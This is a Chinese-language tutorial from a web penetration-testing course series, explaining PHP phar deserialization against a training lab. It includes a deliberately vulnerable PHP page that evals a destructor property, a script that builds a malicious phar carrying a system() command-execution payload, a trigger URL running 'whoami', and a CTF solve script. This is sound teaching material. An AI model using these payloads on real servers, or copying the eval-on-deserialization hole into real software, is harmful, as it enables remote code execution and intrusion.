WEB渗透—反序列化（十一）

Web渗透—反序列化课程学习分享（课程非本人制作，仅提供学习分享）

靶场下载地址：GitHub - mcc0624/php_ser_Class: php反序列化靶场课程，基于课程制作的靶场

课程地址：PHP反序列化漏洞学习_哔哩哔_bilibili

二十一、phar反序列化原理

1.什么是phar

JAR是开发Java程序的一个应用，包括所有的可执行、可访问的文件，都打包进了一个JAR文件里，使得部署过程十分简单。

PHAR(“Php ARchive”)是PHP里类似于JAR的一种打包文件。

对于PHP 5.3或更高版本，Phar后缀文件是默认开启支持的，可以直接使用它。

文件包含：phar伪协议，可读取.phar文件。

Phar的结构:

1）stub phar 文件标识，格式为xxx<?php xxx;__HALT_COMPILER();?>; (头部信息)

2）manifset 压缩文件的属性等信息，以序列化存储；

3）contents 压缩文件的内容；

4）signature 签名，放在文件末尾

Phar协议解析文件时，会自动触发对manifest字段的序列化字符串进行反序列化

压缩:

<?php
$phar = new Phar('test2.phar',0,'test2.phar');   //创建一个test2.phar文件
$phar->buildfromDirectory('f:\0Day');            //添加0Day文件夹内的所有文件添加到test2.phar文件中
$phar->setDefaultStub('test.txt','test.txt');    //设置执行时的入口文件，第一个用于命令行，第二个用于浏览器访问，这里都设置为"test.txt"
?>

new Phar可以创建一个 PHAR 文件对象，在例题中传入了三个参数：文件名、文件的压缩模式（0 表示不压缩）以及 PHAR 文件内部的别名（可选）。

buildfromDirectory方法的作用是将指定目录中的文件添加到 PHAR 文件中。它会递归地遍历目录下的所有文件和子目录，并将它们添加到 PHAR 文件的内容中

setDefaultStub方法的作用是设置 PHAR 文件的默认入口点。入口点是指在执行 PHAR 文件时，首先执行的文件或脚本。

解压缩:

<?php
$phar = new Phar('test.phar');
$phar->extractTo('test');        //将PHAR文件中的内容提取到指定的目录test
?>

extractTo方法的作用是将 PHAR 文件中的内容提取到指定的目录。它接受一个参数，即目标目录的路径，将 PHAR 文件中的所有文件和目录提取到该目录中。

2.Phar漏洞原理

manifset压缩文件的属性等信息，以序列化存储；存在一段序列化的字符串；

调用phar伪协议，可读取 .phar 文件；

Phar协议解析文件时，会自动触发对manifest字段的序列化字符串进行反序列化。

Phar需要PHP>=5.2在php.ini中将phar.readonly设为Off（注意去掉前面的分号）

受影响的函数
fileatime	filectime	file_exists	file_get_contents
file_put_contents	file	filegroup	fopen
fileinode	filemtime	fileowner	fileperms
is_dir	is_executable	is_file	is_link
is_readable	is_writable	is_writeable	parse_ini_file
copy	unlink	stat	readfile

3.漏洞实验验证

index.php

<?php
class Testobj{
    var $output="echo 'ok';";
    function __destruct(){             //反序列化Testobj触发__destruct()，调用output值
        eval($this->output);
    }
}
if(isset($_GET['filename'])){
    $filename=$_GET['filename'];       //提交文件名filename，file_exists读取文件
    var_dump(file_exists($filename));  //检查文件是否存在
}
?>

file_exists有文件包含功能，可调用phar伪协议，读取test.phar

phar.php

<?php
class Testobj{
    var $output='';
}
@unlink('test.phar');              //删除之前的test.phar文件(如果有)
$phar=new Phar('test.phar');       //创建一个phar对象，文件名必须以phar为后缀
$phar->startBuffering();           //开始写文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');    //写入stub
$o=new Testobj();
$o->output='system($_GET["cmd"]);';
$phar->setMetadata($o);                           //写入meta-data
$phar->addFromString("test.txt","test");          //添加要压缩的文件
$phar->stopBuffering();
?>

注意：需要PHP>=5.2在php.ini中将phar.readonly设为Off

思路：

1）生成phar文件test.phar，给其中output赋值为system($_GET["cmd"]);

2）Phar协议解析文件时，会自动触发manifest字段的序列化字符串进行反序列化

3）反序列化触发__destruct()，执行eval($this->output);

4）而反序列化后output='system($_GET["cmd"]);'，cmd的值变得可控

5）构造payload：URL?filename=phar://test.phar&cmd=whoami

4.Phar漏洞条件

1）phar文件能上传到服务器端；

(可手动修改后缀，不识别后缀名)

2）要有可用反序列化魔术方法作为跳板；

(需要有__wakeup()、__destruct()魔术方法)

3）要有文件操作函数;

(如file_exosts($filename)，fopen()，file_get_contents())

4）文件操作函数参数可控，且 :、/、phar 等特殊字符没有被过滤

二十二、phar反序列化例题

1.实例代码

目标：输出flag

<?php
class TestObject {
    public function __destruct() {    //反序列化TestObject()触发__destruct执行echo $flag
        include('flag.php');
        echo $flag;
    }
}
$filename = $_POST['file'];           //通过POST提交file赋值$filename
if (isset($filename)){                //判断是否有$filename值传递
    echo md5_file($filename);         //计算文件的MD5值
}
//upload.php
?>

md5_file()是一个PHP内置函数，用于计算指定文件的MD5值

根据例题中的提示，我们发现了upload.php页面，可以进行文件上传

判断是否具有Phar漏洞条件：

1）phar文件能上传到服务器端（ /upload.php ）

2）要有可反序列化魔术方法作为跳板（ __destruct() ）

3）要有文件操作函数（ md5_file ）

4）文件操作函数参数可控（ $POST['file'] ）

2.解题代码

<?php
class TestObject{
}
@unlink('test.phar');           //删除之前的test.phar文件(如果有)
$phar=new Phar('test.phar');    //创建一个phar对象，文件名必须以phar为后缀
$phar->startBuffering();        //开始写文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');      //写入stub
$o=new TestObject();
$phar->setMetadata($o);                             //写入meta-data
$phar->addFromString("test.txt","test");            //添加要压缩的文件
$phar->stopBuffering();
?>

利用php脚本创建一个phar文件，其中 mate-data 里放置一个包含TestObject()的序列化字符串